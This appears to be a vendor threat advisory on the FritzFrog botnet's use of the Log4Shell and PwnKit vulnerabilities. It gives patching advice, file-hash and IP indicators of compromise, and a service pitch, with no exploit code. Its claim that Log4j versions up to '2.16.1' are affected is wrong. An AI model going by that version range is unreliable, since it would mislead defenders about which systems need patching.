overview

The FritzFrog botnet, known for its persistent and sophisticated attacks, has returned with a new arsenal, leveraging the Log4Shell vulnerability (CVE-2021-44228) alongside PwnKit (CVE-2021-4034) to infiltrate networks.  

  • CVE-2021-44228 (CVSS 10) is a critical zero-day vulnerability that was found in the Apache Log4j2 Java-based logging library in December 2021. The vulnerability is an unauthenticated remote code execution (RCE) flaw that allows for complete system takeover with Log4j2.0-beta9 up to 2.16.1.  
  • CVE-2021-4034 (CVSS 7.8) is a vulnerability within the PolKit Linux component that is exploited to enlist the pkexec binary. This binary operates with root privileges even when activated by a user with limited permissions, thus facilitating the loading and execution of FritzFrog's binary payload. 

Recently, we learned that Log4Shell is being exploited in a brute-force manner, targeting vulnerable Java applications within compromised networks. This marks a significant shift in FritzFrog's tactics, as it now focuses on internal hosts rather than solely targeting externally accessible assets. By exploiting Log4Shell, FritzFrog can potentially breach systems that may have been overlooked during initial vulnerability patching efforts. Also, FritzFrog’s use of the PwnKit flaw allows them to achieve local privilege escalation, enhancing its persistence and allowing for deeper infiltration into compromised networks. 

Originally identified in January 2020, FritzFrog has evolved, expanding its targets beyond internet-facing servers with weak SSH credentials to include various sectors such as healthcare, education, and government. Also, the botnet has enhanced its SSH brute-forcing capabilities to identify specific targets and evade traditional security measures. 

If organizations have not already done so, Avertium strongly recommends patching the Log4Shell and PwnKit vulnerabilities across all endpoints, including internal systems. 

 

 

avertium's recommendationS

  • As previously stated, Avertium recommends patching the Log4Shell vulnerability as soon as possible. 
  • Due to all Polkit versions from 2009 onwards being vulnerable, Avertium recommends patching the vulnerability as soon as possible.  


 

 

INDICATORS OF COMPROMISE (IoCs)

File Hashes 

  • 103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046 
  • 39ab194dc7a7ba65615a30d99ed8845ee00ad19f2ac1236fbd71a671f7fa4c5a 
  • 3205603282a636979a55aa1e1be518cd3adcbbe491745d996ceb4b5a4dece0c5 
  • 85cb8ceda7d2a29bc7c6c96dd279c43559797a624fc15d44da53ca02379afe01 
  • 6fe6808b9cfe654f526108ec61cb5211bb6601d28e192cadf06102073b54f69c 
  • 30c150419000d27dafcd5d00702411b2b23b0f5d7e4d0cc729a7d63b2e460a01 
  • f77ab04ee56f3cd4845d4a80c5817a7de4f0561d976d87563deab752363a765d 
  • 9384b9e39334479194aacb53cb25ace289b6afe2e41bdc8619b2d2cae966b948 
  • f718d6d12006b59b6d8f173e8cf31d3b 
  • 0ab8836efcaa62c7daac314e0b7ab1679319b2901578fd9e95ec3476b4c1a732 
  • 23e390e6531623c1e9e09b1eaf807d501d1a01e45184b7d3ffc4eeed955b0c6d 
  • 7f18e5b5b7645a80a0d44adf3fecdafcbf937bfe30a4cfb965a1421e034996dd 
  • 7745b070943e910e8807e3521ac7b7a01401d131bf6c18a63433f8177ed539a6 
  • 453468b86856665f2cc0e0e71668c0b6aac8b14326c623995ba5963f22257619 
  • 001eb377f0452060012124cb214f658754c7488ccb82e23ec56b2f45a636c859 
  • 8c094313b1d4236ae3f630d93e8037b0a9d38df716d5d7aed5b871dea0dc1445 
  • 041bc20ca8ac3161098cbc976e67e3c0f1b672ad36ecbe22fd21cbd53bcaa742 
  • 2378e76aba1ad6e0c937fb39989217bf0de616fdad4726c0f4233bf5414cde86 
  • d1e82d4a37959a9e6b661e31b8c8c6d2813c93ac92508a2771b2491b04ea2485 
  • 52b11d3fa9206f51c601bd85cb480102fd938894b7274fac3d20915eb3af44f8 
  • 985ffee662969825146d1b465d068ea4f5f01990d13827511415fd497cf9db86 
  • 705b6c079f6198e4be813d2b1967bf5482bc20fe 
  • 0b95071c657f23d4d8bfa39042ed8ad0a1c1bceb6b265c1237c12c4c0818c248 
  • 90b61cc77bb2d726219fd00ae2d0ecdf6f0fe7078529e87b7ec8e603008232d5 
  • 5fb29fb0136978b9ccf60750af09cec74a257a0ca9c47159ca74dbba21fbcc59 
  • fb3371dd45585763f1436afb7d64c202864d89ee6cbb743efac9dbf1cefcc291 
  • d9e8d9187fdd5a6682cc3b55076fe48bc8743487eb4731f669a7d591d3015ce5 
IP Addresses  
  • 1.192.94.61 
  • 100.0.197.18 
  • 100.4.215.106 
  • 102.131.59.246 
  • 102.135.176.181 
  • 103.127.80.9 
  • Please note that Avertium has discovered a surplus of IP Addresses, which we are monitoring.  

 

 

How Avertium is Protecting Our CUSTOMERS

Avertium aligns your Cybersecurity Strategy with your business strategy, ensuring that your investment in security is also an investment in your business. Our Cybersecurity Strategy service includes:  
  • Strategic Security Assessments - Strengthening your security posture begins with knowing where your current program stands (NIST CSF, Security Architecture, Business Impact Analysis, Sensitive Data Inventory, Network Virtualization and Cloud Assessment). 
  • Threat Mapping – Leverage Avertium’s Cyber Threat Intelligence, getting a more informed view of your most likely attack scenarios (Threat Assessment and MITRE ATT&CK). 
  • Cyber Maturity Roadmap - Embrace a comprehensive, quantifiable, and well-organized approach to establishing and continuously enhancing your cybersecurity resilience (Policy + Procedure Development, Virtual CISO (VCISO), Training + Enablement, Tabletop Exercises, and Business Continuity + Disaster Recovery Plan). 



 

SUPPORTING DOCUMENTATION

Apache Log4j Core: CVE-2021-44832: Apache Log4j2 Remote Code Execution (rapid7.com) 

Sophisticated FritzFrog P2P Botnet Returns After Long Break - SecurityWeek 

FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities - Help Net Security 

LIVEcommunity - Ubuntu Patch for CVE-2021-4034 - LIVEcommunity - 461834 (paloaltonetworks.com) 

FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network (thehackernews.com) 

USN-5252-2: PolicyKit vulnerability | Ubuntu security notices | Ubuntu 

CVE-2021-4034 | Ubuntu 

USN-5252-1: PolicyKit vulnerability | Ubuntu security notices | Ubuntu 

 
Chat With One of Our Experts



Flash Notice Log4Shell PwnKit FritzFrog botnet Blog